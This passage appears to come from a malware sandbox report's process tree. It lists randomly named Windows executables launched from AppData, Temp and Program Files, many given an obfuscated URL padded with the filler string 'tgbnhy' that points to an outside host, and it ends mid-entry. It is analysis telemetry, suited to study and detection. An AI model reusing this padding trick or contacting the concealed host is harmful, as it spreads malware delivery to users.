iAyMDIzLTA3LTAxVDAwOjI4OjU2WiIgY2RuX2NhY2hlPSJISVQiIGNkbl9wM3A9IiIgZG93bmxvYWRlZD0iMTU5ODk0NCIgdG90YWw9IjE1OTg5NDQiIGRvd25sb2FkX3RpbWVfbXM9IjE1MDYiLz48ZXZlbnQgZXZlbnR0eXBlPSIxNCIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTUzODcxMTY5NzIiIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxNSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTUzOTI3MDcxMDMiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48cGluZyByPSIxNyIgcmQ9IjYwMjciIHBpbmdfZnJlc2huZXNzPSJ7QTRGMzIwQ0QtMzQ0RS00MUYyLUJFOUYtNTk2RDEwNTNGREM4fSIvPjwvYXBwPjxhcHAgYXBwaWQ9Ins1NkVCMThGOC1CMDA4LTRDQkQtQjZEMi04Qzk3RkU3RTkwNjJ9IiB2ZXJzaW9uPSI5Mi4wLjkwMi42NyIgbmV4dHZlcnNpb249IiIgbGFuZz0iIiBicmFuZD0iSU5CWCIgY2xpZW50PSIiIGV4cGVyaW1lbnRzPSJjb25zZW50PWZhbHNlIiBpc19waW5uZWRfc3lzdGVtPSJ0cnVlIiBsYXN0X2xhdW5jaF9jb3VudD0iMSIgbGFzdF9sYXVuY2hfdGltZT0iMTMzMzQzMTIzMTQwMDk5MjgwIj48dXBkYXRlY2hlY2svPjxwaW5nIGFjdGl2ZT0iMSIgYT0iLTEiIHI9IjE3IiBhZD0iLTEiIHJkPSI2MDI3IiBwaW5nX2ZyZXNobmVzcz0iezdDRDE0NTc1LTlDREEtNDY1Qi05RjgyLUY0OUQ0NEJFMjZBMX0iLz48L2FwcD48YXBwIGFwcGlkPSJ7RjMwMTcyMjYtRkUyQS00Mjk1LThCREYtMDBDM0E5QTdFNEM1fSIgdmVyc2lvbj0iMTE0LjAuMTgyMy44NiIgbmV4dHZlcnNpb249IiIgbGFuZz0iIiBicmFuZD0iR0dMUyIgY2xpZW50PSIiIGV4cGVyaW1lbnRzPSJjb25zZW50PWZhbHNlIiBpbnN0YWxsYWdlPSIwIiBpbnN0YWxsZGF0ZT0iNjA0MSIgbGFzdF9sYXVuY2hfY291bnQ9IjEiIGxhc3RfbGF1bmNoX3RpbWU9IjEzMzM0MzEyMzQ3NTY4ODg3MCI-PHVwZGF0ZWNoZWNrLz48cGluZyBhY3RpdmU9IjEiIGE9Ii0xIiByPSItMSIgYWQ9Ii0xIiByZD0iLTEiIHBpbmdfZnJlc2huZXNzPSJ7RjIyNjY5OTQtRTI1Ny00M0YxLThBMUItRUM1M0EyNUU0MENCfSIvPjwvYXBwPjwvcmVxdWVzdD4
2⤵
PID:684

C:\Program Files (x86)\Caret\gridding.exe
"C:\Program Files (x86)\Caret\gridding.exe"
1⤵
PID:7184

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:3020

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:8296

C:\Users\Admin\AppData\Local\Temp\nsr6676.tmp\Ceaseless.exe
C:\Users\Admin\AppData\Local\Temp\nsr6676.tmp\Ceaseless.exe ""tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB""
2⤵
PID:8416

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:6172

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:8100

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:8380

C:\Program Files (x86)\Neurobiological\Ceaseless.exe
"C:\Program Files (x86)\Neurobiological\Ceaseless.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:5660

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:7020

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=Lashing.exe --webview-exe-version=1.0.0.0 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\tim110\EBWebView" --noerrdialogs --embedded-browser-webview-dpi-awareness=0 --disable-features=MojoIpcz --mojo-named-platform-channel-pipe=7020.8472.17157079777147019668
2⤵
PID:2496

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\tim110\EBWebView /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\tim110\EBWebView\Crashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=114.0.5735.201 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=114.0.1823.86 --initial-client-data=0x168,0x16c,0x170,0x144,0x1bc,0x7ffe21264210,0x7ffe21264220,0x7ffe21264230
3⤵
PID:6516

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=Lashing.exe --webview-exe-version=1.0.0.0 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\tim110\EBWebView" --noerrdialogs --embedded-browser-webview-dpi-awareness=0 --disable-features=MojoIpcz --mojo-named-platform-channel-pipe=7020.8472.16926636488022246704
2⤵
PID:4308

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:1264

C:\Users\Admin\AppData\Local\Temp\nsd9E10.tmp\Ceaseless.exe
C:\Users\Admin\AppData\Local\Temp\nsd9E10.tmp\Ceaseless.exe ""tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB""
2⤵
PID:8272

C:\Users\Admin\AppData\Roaming\sefanathread\sefanathread.exe
C:\Users\Admin\AppData\Roaming\sefanathread\sefanathread.exe
1⤵
PID:5148

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:5484

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:9524

C:\Users\Admin\AppData\Local\Lashing.exe
C:\Users\Admin\AppData\Local\Lashing.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:9564

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:9656

C:\Program Files (x86)\Sewer\Ceaseless.exe
"C:\Program Files (x86)\Sewer\Ceaseless.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:10032

C:\Program Files (x86)\Sewer\Lashing.exe
"C:\Program Files (x86)\Sewer\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:9204

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:9096

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:6392

C:\Program Files (x86)\Caret\gridding.exe
"C:\Program Files (x86)\Caret\gridding.exe"
1⤵
PID:8292

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:7060

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:7136

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:2388

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:3396

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:5880

C:\Users\Admin\AppData\Local\Temp\nsj285A.tmp\Ceaseless.exe
C:\Users\Admin\AppData\Local\Temp\nsj285A.tmp\Ceaseless.exe ""tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB""
2⤵
PID:6452

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:4524

C:\Users\Admin\AppData\Local\Temp\nsgA1C5.tmp\Ceaseless.exe
C:\Users\Admin\AppData\Local\Temp\nsgA1C5.tmp\Ceaseless.exe ""tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB""
2⤵
PID:9492

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:10084

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:5512

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:5872

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:10148

C:\Program Files (x86)\Caret\gridding.exe
"C:\Program Files (x86)\Caret\gridding.exe"
1⤵
PID:3868

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:3192

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:5328

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:4260

C:\Users\Admin\AppData\Local\Temp\nso8E57.tmp\Ceaseless.exe
C:\Users\Admin\AppData\Local\Temp\nso8E57.tmp\Ceaseless.exe ""tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB""
2⤵
PID:3224

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:7296

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:4264

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:3584

C:\Users\Admin\AppData\Local\Temp\nsjF464.tmp\Ceaseless.exe
C:\Users\Admin\AppData\Local\Temp\nsjF464.tmp\Ceaseless.exe ""tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB""
2⤵
PID:556

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:1684

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:1584

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:10056

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:9352

C:\Program Files (x86)\Caret\gridding.exe
"C:\Program Files (x86)\Caret\gridding.exe"
1⤵
PID:3648

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:9588

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:9292

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:2360

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:9368

C:\Users\Admin\AppData\Local\Temp\nsxBBEA.tmp\Ceaseless.exe
C:\Users\Admin\AppData\Local\Temp\nsxBBEA.tmp\Ceaseless.exe ""tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB""
2⤵
PID:8752

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:3812

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:8840

C:\Users\Admin\AppData\Local\Temp\nsk16F.tmp\Ceaseless.exe
C:\Users\Admin\AppData\Local\Temp\nsk16F.tmp\Ceaseless.exe ""tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB""
2⤵
PID:6560

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:7112

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:4456

C:\Users\Admin\AppData\Local\Ceaseless.exe
